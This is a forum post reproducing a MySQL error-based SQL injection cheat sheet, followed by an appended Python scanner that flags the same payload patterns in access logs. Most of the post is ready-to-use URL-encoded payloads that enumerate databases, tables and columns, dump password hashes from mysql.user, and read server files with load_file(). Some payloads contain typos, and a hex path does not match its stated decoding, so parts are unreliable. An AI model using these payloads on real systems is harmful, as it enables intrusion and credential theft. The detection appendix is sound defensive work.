
MySQL error-based injection reference (pdf)

Original poster, posted on 2013-7-27 11:00:46
This post was last edited by Nightmare on 2013-3-17 14:20
MySQL error-based injection reference (pdf), one post a day...

MySql Error Based Injection Reference
[MySQL error-based injection reference]
Author: pnig0s1992
Blog: http://pnig0s1992.blog.51cto.com/
Team: http://www.FreeBuf.com/
Tested on MySQL 5.0.91; succeeds on the vast majority of 5.x versions.
A small number of versions throw an error when name_const() is used; the Method.2 given below can be used for testing instead.

Query the version:
Method.1: and+exists(select*from+(select*from(select+name_const(@@version,0))a+join+(select+name_const(@@version,0))b)c)
Method.2: and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(SELECT+version()))a+from+information_schema.tables+group by a)b)

Query the current user:
Method.1: and+exists(select*from+(select*from(select+name_const(user(),0))a+join+(select+name_const(user(),0))b)c)
Method.2: and+(select+1+from(select+count(*),concat((select+(select+user())+from+information_schema.tables+limit+0,1).floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)

Query the current database:
Method.1: and+exists(select*from+(select*from(select+name_const(database(),0))a+join+(select+name_const(database(),0))b)c)
Method.2: and+(select+1+from(select+count(*),concat((select+(select+database())+from+information_schema.tables+limit+0,1).floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)

Enumerate databases one by one:
and+exists(select*from+(select*from(select+name_const((SELECT+distinct+schema_name+FROM+information_schema.schemata+LIMIT+n,1),0))a+join+(select+name_const((SELECT+distinct+schema_name+FROM+information_schema.schemata+LIMIT+n,1),0))b)c)
Replace n in sequence.

Get the number of tables in a given database:
and+(select+1+from(select+count(*),concat((select+(select+(SELECT+count(table_name)+FROM+`information_schema`.tables+WHERE+table_schema=0x6D7973716C))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1
0x6D7973716C=mysql

Enumerate tables one by one:
and+(select+1+from(select+count(*),concat((select+(select+(SELECT+distinct+table_name+FROM+information_schema.tables+Where+table_schema=0x6D7973716C+limit+n,1))+from+information_schema.tables+limit+0,1).floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1
0x6D7973716C=Mysql; replace n in sequence.

Get the number of columns in a table:
and+(select+1+from(select+count(*),concat((select+(select+(SELECT+count(column_name)+FROM+`information_schema`.columns+WHERE+table_schema=0x6D7973716C+AND+table_name=0x636F6C756D6E735F70726976))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1

Enumerate columns one by one:
and+(select+1+from(select+count(*),concat((select+(select+(SELECT+distinct+column_name+FROM+information_schema.columns+Where+table_schema=0x6D7973716C+AND+table_name=0x636F6C756D6E735F70726976+limit+n,1))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1
Replace n in sequence.

Enumerate contents one by one:
and+(select+1+from(select+count(*),concat((select+(select+(select+password+from+mysql.user+limit+n,1))+from+information_schema.tables+limit+0,1).floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1
Replace n in sequence.

Dump file contents:
and+(SELECT+1+FROM+(select count(*),concat(floor(rand(0)*2),(SELECT+substring(load_file(0x433A5C5C746573742E617361),1,64)))a+from+information_schema.tables+group+by+a)b)
0x433A5C5C626F6F742E696E69=C:\\boot.ini. Because only 64 bytes of content can be shown at a time, substring() has to be used to control which bytes are displayed.

Thx for reading.

No need to download it either.
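As an added defensive example (not from the post or from the PDF it reproduces): a small Python scanner that URL-decodes request URIs from constructed access-log lines, flags the error-based probe shapes listed above (the duplicated name_const() join, the floor(rand(0)*2) ... group by double query, information_schema lookups, load_file() and mysql.user reads), and decodes 0x hex literals to show which schema, table or file a request targeted. The log lines, the indicator names and the regular expressions are assumptions of this example.

```python
import re
from urllib.parse import unquote_plus

# Signatures derived from the payload shapes documented in the post; names are constructed.
INDICATORS = {
    "name_const_join": re.compile(r"name_const\s*\(.*?\bjoin\b.*?name_const\s*\(", re.I | re.S),
    "rand_floor_groupby": re.compile(r"floor\s*\(\s*rand\s*\(\s*0?\s*\)\s*\*\s*2\s*\).*?group\s+by", re.I | re.S),
    "information_schema": re.compile(r"information_schema\s*\.\s*(tables|schemata|columns)", re.I),
    "load_file": re.compile(r"load_file\s*\(", re.I),
    "mysql_user_table": re.compile(r"\bmysql\s*\.\s*user\b", re.I),
}
HEX_LITERAL = re.compile(r"0x([0-9a-fA-F]{2,})")

def decode_hex_literals(sql):
    """Decode MySQL 0x... literals (e.g. 0x6D7973716C -> 'mysql') to show what the query targets."""
    found = []
    for h in HEX_LITERAL.findall(sql):
        if len(h) % 2 == 0:  # odd-length runs are not byte strings, skip them
            found.append(bytes.fromhex(h).decode("utf-8", errors="replace"))
    return found

def analyse_request(raw_query):
    """URL-decode a query string and return (matched indicator names, decoded hex literals)."""
    # Decode twice: payloads use '+' for spaces and clients often percent-encode the value once more.
    decoded = unquote_plus(unquote_plus(raw_query))
    hits = [name for name, pat in INDICATORS.items() if pat.search(decoded)]
    return hits, decode_hex_literals(decoded)

def scan_access_log(lines):
    """Return (line_no, hits, literals) for every log line whose query string matches an indicator."""
    findings = []
    for i, line in enumerate(lines, 1):
        m = re.search(r'"(?:GET|POST) (\S+)', line)
        if not m or "?" not in m.group(1):
            continue
        hits, lits = analyse_request(m.group(1).split("?", 1)[1])
        if hits:
            findings.append((i, hits, lits))
    return findings

# Constructed sample lines: one benign request, then two probes shaped like the post's version() and table-count payloads.
SAMPLE_LOG = [
    '10.0.0.5 - - [27/Jul/2013:11:00:46 +0800] "GET /news.php?id=1 HTTP/1.1" 200 512',
    '10.0.0.9 - - [27/Jul/2013:11:01:02 +0800] "GET /news.php?id=1+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(SELECT+version()))a+from+information_schema.tables+group+by+a)b) HTTP/1.1" 500 233',
    '10.0.0.9 - - [27/Jul/2013:11:01:30 +0800] "GET /news.php?id=1+and+(select+1+from(select+count(*),concat((select+(SELECT+count(table_name)+FROM+information_schema.tables+WHERE+table_schema=0x6D7973716C)),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a) HTTP/1.1" 500 233',
]

if __name__ == "__main__":
    for line_no, hits, lits in scan_access_log(SAMPLE_LOG):
        print(f"line {line_no}: {', '.join(hits)}; hex literals -> {lits}")
```

The HTTP 500 on the flagged lines is the other half of the picture: an error-based probe only works when the database error reaches the client, so pairing this with a check that the application returns a generic error page closes the channel the post relies on.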